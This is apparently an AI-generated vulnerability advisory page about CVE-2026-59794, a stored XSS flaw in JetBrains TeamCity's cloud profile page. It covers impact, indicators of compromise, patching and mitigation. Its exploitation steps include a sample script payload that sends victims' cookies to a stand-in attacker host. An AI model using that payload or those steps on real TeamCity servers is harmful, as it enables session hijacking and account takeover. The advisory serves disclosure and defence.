CVE-2026-59794
JetBrains TeamCity vulnerability analysis and mitigation

Overview

CVE-2026-59794 is a stored Cross-Site Scripting (XSS) vulnerability in JetBrains TeamCity affecting all versions before 2026.1.2. The flaw exists on the cloud profile page, where agent-reported data is not properly sanitized before being rendered, allowing an authenticated attacker to inject persistent malicious scripts. It was published on July 10, 2026. The CVSS v3.1 base score is reported as 5.4 (Medium) by NVD and 7.3 (High) by the GitHub Advisory Database, reflecting differing scope assessments (GitHub Advisory, JetBrains).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated user with low privileges can submit malicious script payloads through agent-reported data, which TeamCity stores and subsequently renders unsanitized on the cloud profile page. When another user (potentially an administrator) visits the cloud profile page, the stored payload executes in their browser context. Exploitation requires network access, low privileges, and victim user interaction (page visit), but no special configuration (GitHub Advisory, JetBrains).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the affected cloud profile page, including administrators. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of victims, and manipulation of page content. While availability is not directly impacted, the confidentiality and integrity risks are significant — particularly if an administrator's session is hijacked, potentially enabling further compromise of the TeamCity environment (GitHub Advisory).

Exploitation steps

  1. Authenticate: Obtain a low-privileged account on the target JetBrains TeamCity instance (version prior to 2026.1.2).
  2. Identify the injection point: Locate the mechanism by which build agents report data that is reflected on the cloud profile page within the TeamCity UI.
  3. Inject malicious payload: Submit agent-reported data containing a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) through the agent reporting interface.
  4. Wait for victim interaction: The payload is stored server-side and executes whenever a user (e.g., an administrator) navigates to the cloud profile page in their browser.
  5. Harvest results: Collect stolen session tokens, cookies, or other sensitive data from the attacker-controlled server, then use them to impersonate the victim or escalate privileges within TeamCity (GitHub Advisory).

Indicators of compromise

  • Logs: TeamCity server logs showing unusual or unexpected script-like strings (e.g., <script>, javascript:, onerror=) in agent-reported data fields associated with cloud profile pages.
  • Network: Outbound HTTP/S requests from administrator or user browsers to unknown external domains shortly after visiting the TeamCity cloud profile page; unexpected DNS lookups from client machines browsing TeamCity.
  • File System: No specific file-system artifacts expected for a stored XSS attack of this nature.
  • Process/Session: Unexpected session activity from administrator accounts (e.g., logins from new IPs, configuration changes) following visits to the cloud profile page, which may indicate session hijacking.

Mitigation and workarounds

JetBrains has released a patch in TeamCity version 2026.1.2, which resolves this vulnerability. All users running TeamCity versions prior to 2026.1.2 should upgrade immediately. As interim mitigations, administrators should implement Content Security Policy (CSP) headers to limit the impact of any XSS execution, and restrict which users or agents have the ability to submit agent-reported data. Reviewing and auditing existing agent-reported data for suspicious content is also recommended (JetBrains, GitHub Advisory).

Community reactions

Several security news outlets covered this vulnerability as part of a broader JetBrains patch release addressing six vulnerabilities across TeamCity, YouTrack, and IntelliJ IDEA. Coverage appeared on GBHackers, CyberSecurityNews, SecurityOnline, HealSecurity, and VPNcentral, generally framing the issue as a moderate-severity flaw requiring prompt patching. No notable independent researcher commentary or significant social media discussion specific to this CVE has been identified beyond standard vulnerability aggregation (GBHackers, CyberSecurityNews, VPNcentral).

Additional resources


SourceThis report was generated using AI

Related JetBrains TeamCity vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-59793HIGH8.8
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-59796HIGH8.1
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-59795MEDIUM6.1
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-59794MEDIUM5.4
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesJul 10, 2026
CVE-2026-49381MEDIUM4.8
  • JetBrains TeamCity logoJetBrains TeamCity
  • cpe:2.3:a:jetbrains:teamcity
NoYesMay 29, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management